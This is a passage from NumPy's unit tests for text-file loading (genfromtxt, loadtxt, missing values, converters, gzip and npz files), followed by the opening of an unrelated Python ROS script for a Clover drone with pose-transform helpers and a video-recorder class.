data = StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(StringIO(asbytes("\n".join(data))), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
warnings.filterwarnings("ignore")
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
StringIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(StringIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(StringIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
warnings.resetwarnings()
def test_header(self):
"Test retrieving a header"
data = StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(asbytes_nested(['M', 'F'])),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(asbytes_nested(['A', 'BCD'])),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 02, 03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 02, 03), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((asbytes('r') in x.lower() and x.split()[-1]) or
(not asbytes('r') in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((asbytes('%') in x.lower() and x.split()[0]) or
(not asbytes('%') in x.lower() and x.strip() or 0.0))
s = StringIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n" \
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = StringIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = asbytes(""" 1; 2001-01-01
2; 2002-01-31 """)
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(StringIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(StringIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(StringIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(StringIO("1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(StringIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
warnings.filterwarnings("ignore", message="genfromtxt: Empty input file:")
data = StringIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = StringIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(StringIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(StringIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = StringIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(StringIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(StringIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(StringIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = "1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_recfromtxt(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2,3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(asbytes('1 2 3\n'))
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(asbytes('1 2 3\n'))
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = StringIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.iteritems():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in list(z.iterkeys()))
if __name__ == "__main__":
run_module_suite()
|
ALL_IN_ONE_C_2.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Импорт библиотек
import math
import rospy
import time
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from std_msgs.msg import Int32, Header, Float32
from cv_bridge import CvBridge, CvBridgeError
import cv2
import numpy as np
from threading import Thread
# import tf2
import tf
import tf2_ros
# import tf2_geometry_msgs
import geometry_msgs
import math
# geometry_msgs.msg.
# tf.transformations.
from nav_msgs.msg import Odometry
from std_msgs.msg import Float32, Int16, Bool
from geometry_msgs.msg import Point, Pose, Quaternion, Twist, Vector3, TransformStamped, PoseStamped
import tf.transformations as t
# from l22_aero_vision.msg import ColorRectMarker, ColorRectMarkerArray
# import tf
try:
from clover import srv
except:
from clever import srv
from std_srvs.srv import Trigger
from mavros_msgs.srv import CommandBool
from std_msgs.msg import String
from pyzbar import pyzbar
import sys
import threading
import os
from mavros_msgs.srv import CommandBool
def orientation_from_euler(roll, pitch, yaw):
q = t.quaternion_from_euler(roll, pitch, yaw)
return orientation_from_quaternion(q)
def euler_from_orientation(o):
q = quaternion_from_orientation(o)
return t.euler_from_quaternion(q)
def orientation_from_quaternion(q):
return Quaternion(*q)
def quaternion_from_orientation(o):
return o.x, o.y, o.z, o.w
TRANSFORM_TIMEOUT = 1
def transform_xyz_yaw(x, y, z, yaw, framefrom, frameto, listener):
p = PoseStamped()
# Pose().fr
p.header.frame_id = framefrom
p.pose.position.x = x
p.pose.position.y = y
p.pose.position.z = z
# p.pose.pse
p.pose.orientation = orientation_from_euler(0, 0, yaw)
# p.pose
# p.pose.orientation
# print "Returning [%s + %s = %s]"%(req.a, req.b, (req.a + req.b))
# pose_local = tf2_geometry_msgs.do_transform_point(p, get_transformation(framefrom, frameto, tf_buffer))
pose_local = listener.transformPose(frameto, p)
target_x = pose_local.pose.position.x
target_y = pose_local.pose.position.y
target_z = pose_local.pose.position.z
target_yaw = euler_from_orientation(pose_local.pose.orientation)[2]
return target_x, target_y, target_z, target_yaw
class VideoRecorder:
def __init__(self):
self.fourcc = cv2.VideoWriter_fourcc(*'XVID')
if not os.path.exists(os.environ['HOME']+"/L22_AERO_LOG"):
os.mkdir(os.environ['HOME']+"/L22_AERO_LOG")
